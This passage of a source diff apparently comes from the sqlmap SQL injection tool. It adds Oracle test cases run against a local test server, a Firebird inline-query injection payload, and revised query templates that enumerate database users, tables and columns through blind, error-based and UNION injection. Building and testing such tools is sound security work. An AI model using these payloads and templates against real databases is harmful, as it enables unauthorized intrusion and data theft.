<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'"/>
</parse>
</case>
<case name="Oracle UNION query multi-threaded search enumeration - column given databases and table">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="U"/>
<search value="True"/>
<db value="sys,foobar"/>
<tbl value="users"/>
<col value="surname"/>
<answers value="do you want to dump=N"/>
</switches>
<parse>
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'"/>
</parse>
</case>
<!-- TODO: add IBM DB2 test cases -->
<case name="SQLite multi-threaded search enumeration - database">
<switches>
<url value="http://debiandev/sqlmap/sqlite/get_int.php?id=1"/>
@ -1845,6 +2359,73 @@
<item value="r'SELECT \* FROM users ORDER BY name \[5\].+1, luther, blisset.+2, fluffy, bunny.+3, wu, ming'"/>
</parse>
</case>
<case name="Oracle boolean-based multi-threaded custom SQL query enumeration">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="B"/>
<query value="SELECT * FROM users WHERE ROWNUM=1"/>
</switches>
<parse>
<item value="r'SELECT \* FROM users WHERE ROWNUM=1.+1, luther, blisset'"/>
</parse>
</case>
<case name="Oracle error-based multi-threaded custom SQL query enumeration">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="E"/>
<query value="SELECT * FROM users WHERE ROWNUM=1"/>
</switches>
<parse>
<item value="r'SELECT \* FROM users WHERE ROWNUM=1 \[.+1.+luther'"/>
</parse>
</case>
<case name="Oracle UNION query multi-threaded custom SQL query enumeration">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="U"/>
<query value="SELECT * FROM users WHERE ROWNUM=1"/>
</switches>
<parse>
<item value="r'SELECT \* FROM users WHERE ROWNUM=1 \[1\].+1, luther, blisset'"/>
</parse>
</case>
<case name="Oracle boolean-based multi-threaded custom ordered SQL query enumeration">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="B"/>
<query value="SELECT * FROM users ORDER BY name"/>
</switches>
<parse>
<item value="r'SELECT \* FROM users ORDER BY name \[5\].+1, luther, blisset.+2, fluffy, bunny.+3, wu, ming'"/>
</parse>
</case>
<case name="Oracle error-based multi-threaded custom ordered SQL query enumeration">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="E"/>
<query value="SELECT * FROM users ORDER BY name"/>
</switches>
<parse>
<item value="r'SELECT \* FROM users ORDER BY name \[5\].+1, luther, blisset.+2, fluffy, bunny.+3, wu, ming'"/>
</parse>
</case>
<case name="Oracle UNION query multi-threaded custom ordered SQL query enumeration">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="U"/>
<query value="SELECT * FROM users ORDER BY name"/>
</switches>
<parse>
<item value="r'SELECT \* FROM users ORDER BY name \[5\].+1, luther, blisset.+2, fluffy, bunny.+3, wu, ming'"/>
</parse>
</case>
<!-- TODO: add IBM DB2 test cases -->
<case name="SQLite boolean-based multi-threaded custom SQL query enumeration">
<switches>
<url value="http://debiandev/sqlmap/sqlite/get_int.php?id=1"/>
@ -1886,7 +2467,6 @@
<query value="SELECT * FROM users ORDER BY name"/>
</switches>
<parse>
<!-- NOTE: it is not sorted on purpose because UNION does not play well with ORDER BY and it is stripped -->
<item value="r'SELECT \* FROM users ORDER BY name \[4\].+1, luther, blisset.+2, fluffy, bunny.+3, wu, ming'"/>
</parse>
</case>

18
xml/payloads.xml
View File

@ -1996,6 +1996,24 @@ Formats:
<dbms>SQLite</dbms>
</details>
</test>
<test>
<title>Firebird inline queries</title>
<stype>6</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3,8</clause>
<where>3</where>
<vector>[QUERY]</vector>
<request>
<payload>SELECT '[DELIMITER_START]'||(CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END)||'[DELIMITER_STOP]' FROM RDB$DATABASE</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>Firebird</dbms>
</details>
</test>
<!-- End of inline queries tests -->

16
xml/queries.xml
View File

@ -209,7 +209,7 @@
<length query="LENGTH(%s)"/>
<isnull query="NVL(%s,' ')"/>
<delimiter query="||"/>
<limit query="ROWNUM AS LIMIT %s ORDER BY 1 ASC) WHERE LIMIT"/>
<limit query="ROWNUM AS LIMIT %s) WHERE LIMIT"/>
<limitregexp query="ROWNUM\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+|ROWNUM\s*=\s*[\d]+"/>
<limitgroupstart/>
<limitgroupstop/>
@ -269,8 +269,8 @@
<blind query="SELECT TABLE_NAME FROM (SELECT TABLE_NAME,ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE OWNER='%s') WHERE LIMIT=%d" count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE OWNER='%s'"/>
</tables>
<columns>
<inband query="SELECT COLUMN_NAME,DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
<blind query="SELECT COLUMN_NAME FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" query2="SELECT DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s'" count="SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
<inband query="SELECT COLUMN_NAME,DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND OWNER='%s'" condition="COLUMN_NAME"/>
<blind query="SELECT COLUMN_NAME FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND OWNER='%s'" query2="SELECT DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s' AND OWNER='%s'" count="SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND OWNER='%s'" condition="COLUMN_NAME"/>
</columns>
<dump_table>
<inband query="SELECT %s FROM %s"/>
@ -359,12 +359,12 @@
<substring query="MID((%s),%d,%d)"/>
<concatenate query="%s&amp;%s"/>
<case query="SELECT (IIF(%s,1,0))"/>
<inference query="ASCW(MID((%s),%d,1)) > %d"/>
<banner/>
<!--CURRENTUSER() is not available outside the MS Access query tool itself-->
<current_user/>
<current_db/>
<hostname/>
<inference query="ASCW(MID((%s),%d,1)) > %d"/>
<is_dba/>
<dbs/>
<!--MSysObjects have no read permission by default-->
@ -401,16 +401,16 @@
<substring query="SUBSTRING((%s) FROM %d FOR %d)"/>
<concatenate query="%s||%s"/>
<case query="SELECT IIF(%s,1,0)"/>
<inference query="ASCII_VAL(SUBSTRING((%s) FROM %d FOR 1)) > %d" dbms_version="&gt;=2.1" query2="SUBSTRING((%s) FROM %d FOR 1) > '%c'"/>
<banner query="SELECT RDB$GET_CONTEXT('SYSTEM','ENGINE_VERSION') FROM RDB$DATABASE" dbms_version="&gt;=2.1"/>
<current_user query="SELECT CURRENT_USER FROM RDB$DATABASE"/>
<current_db query="SELECT RDB$GET_CONTEXT('SYSTEM','DB_NAME') FROM RDB$DATABASE"/>
<hostname/>
<is_dba query="CURRENT_USER='SYSDBA'"/>
<users>
<inband query="SELECT RDB$USER FROM RDB$USER_PRIVILEGES"/>
<blind query="SELECT FIRST 1 SKIP %d DISTINCT(RDB$USER) FROM RDB$USER_PRIVILEGES" count="SELECT COUNT(DISTINCT(RDB$USER)) FROM RDB$USER_PRIVILEGES"/>
</users>
<inference query="ASCII_VAL(SUBSTRING((%s) FROM %d FOR 1)) > %d" dbms_version="&gt;=2.1" query2="SUBSTRING((%s) FROM %d FOR 1) > '%c'"/>
<is_dba query="CURRENT_USER='SYSDBA'"/>
<tables>
<inband query="SELECT RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)"/>
<blind query="SELECT FIRST 1 SKIP %d RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)" count="SELECT COUNT(RDB$RELATION_NAME) FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)"/>
@ -603,8 +603,8 @@
<blind query="SELECT tabname FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,tabname FROM sysstat.tables WHERE tabschema='%s') AS foobar WHERE LIMIT=INT('%d')" count="SELECT COUNT(*) FROM sysstat.tables WHERE tabschema='%s'"/>
</tables>
<columns>
<inband query="SELECT name,RTRIM(coltype)||CHR(40)||RTRIM(CAST(length AS CHAR(254)))||CHR(41) FROM sysibm.syscolumns WHERE tbname='%s'" condition="name"/>
<blind query="SELECT name FROM sysibm.syscolumns WHERE tbname='%s'" query2="SELECT RTRIM(coltype)||CHR(40)||RTRIM(CAST(length AS CHAR(254)))||CHR(41) FROM sysibm.syscolumns WHERE tbname='%s' AND name='%s'" count="SELECT COUNT(name) FROM sysibm.syscolumns WHERE tbname='%s'" condition="name"/>
<inband query="SELECT name,RTRIM(coltype)||CHR(40)||RTRIM(CAST(length AS CHAR(254)))||CHR(41) FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'" condition="name"/>
<blind query="SELECT name FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'" query2="SELECT RTRIM(coltype)||CHR(40)||RTRIM(CAST(length AS CHAR(254)))||CHR(41) FROM sysibm.syscolumns WHERE tbname='%s' AND name='%s' AND tbcreator='%s'" count="SELECT COUNT(name) FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'" condition="name"/>
</columns>
<dump_table>
<inband query="SELECT %s FROM %s"/>